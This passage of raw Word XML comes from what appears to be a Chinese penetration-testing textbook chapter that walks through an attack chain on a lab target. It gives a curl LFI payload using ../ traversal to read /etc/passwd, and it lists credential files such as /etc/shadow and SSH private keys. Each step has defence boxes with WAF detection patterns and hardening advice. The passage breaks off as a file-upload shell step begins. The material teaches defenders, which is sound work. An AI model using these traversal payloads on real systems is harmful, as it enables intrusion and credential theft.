          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数、包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字的请求。对应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1190（Exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Public-Facing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Application）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1059（Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Scripting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Interpreter）的检测映射（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复（安全加固）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数化查询（Parameterized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Queries / Prepared </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Statements）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是消除</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入的根本方法——通过预编译</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语句，将用户输入作为参数绑定，而不是拼接字符串。所有数据库操作都应强制使用此方法①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输入验证与白名单过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在应用层对所有用户输入进行类型、长度、格式的严格校验，拒绝不符合预期的字符（见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Input Validation Cheat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sheet）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">最小权限数据库账户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用连接数据库的账户应仅拥有其业务所需的最小权限（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT/INSERT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对特定表），禁止使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节最小权限原则）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="391"/>
    <w:bookmarkStart w:id="392" w:name="步骤四通过-lfi-读取系统敏感文件"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤四：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">读取系统敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：LFI（Local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Inclusion，本地文件包含）的原理与利用见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（文件包含漏洞）。核心在于，应用在处理文件包含路径时未对用户输入做充分过滤，导致攻击者可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（目录遍历）跳出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录，读取系统任意文件①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">动机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若无法直接通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入获得凭证，或需要收集更多系统信息以用于后续提权，LFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一个关键的信息收集手段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（假设在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">page=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI，实际参数名因靶机而异②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 测试 LFI 是否存在（在浏览器或 curl 中）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># http://&lt;TARGET_IP&gt;/index.php?page=../../../../etc/passwd ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 使用 curl 提取 /etc/passwd 内容</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://&lt;TARGET_IP&gt;/index.php?page=../../../../etc/passwd"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 尝试读取其他敏感文件（以下路径为 Linux 常见敏感文件，实际存在性因靶机而异②）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># /etc/shadow (通常无权限)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># /var/log/apache2/access.log (可能的日志投毒)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># /proc/self/environ (环境变量泄露)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># /home/&lt;USER&gt;/.ssh/id_rsa (SSH 私钥，若可读)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内容会被直接渲染在页面中或作为页面源代码的一部分返回。可据此确认系统存在哪些用户账户。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可读，可能泄露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头信息（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP_USER_AGENT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），这可以用于日志投毒（Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Poisoning）攻击链（转入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE）③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤四】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（WAF/IDS）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中是否包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">..\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等目录遍历和敏感文件路径模式。注意攻击者可能使用编码绕过（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），所以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需进行递归解码后再匹配（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的“规范化与解码”讨论）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复（加固）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：禁止用户输入直接拼入文件包含路径。如需根据参数引入不同页面，使用映射表（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">page=home</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">include/home.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），避免传递实际文件系统路径①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">open_basedir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">限制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：PHP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open_basedir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将文件操作限制在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根目录下，阻止目录遍历（见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方文档，版本因环境而异②）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">禁用不必要的文件函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_include</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（在无此需求的场景下），进一步减少远程/本地文件包含的风险面③。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="392"/>
    <w:bookmarkStart w:id="393" w:name="步骤五通过文件上传漏洞-get-shell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤五：通过文件上传漏洞</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Get Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：文件上传漏洞的利用、绕过技巧（扩展名、MIME</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类型、内容检查）以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用已见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
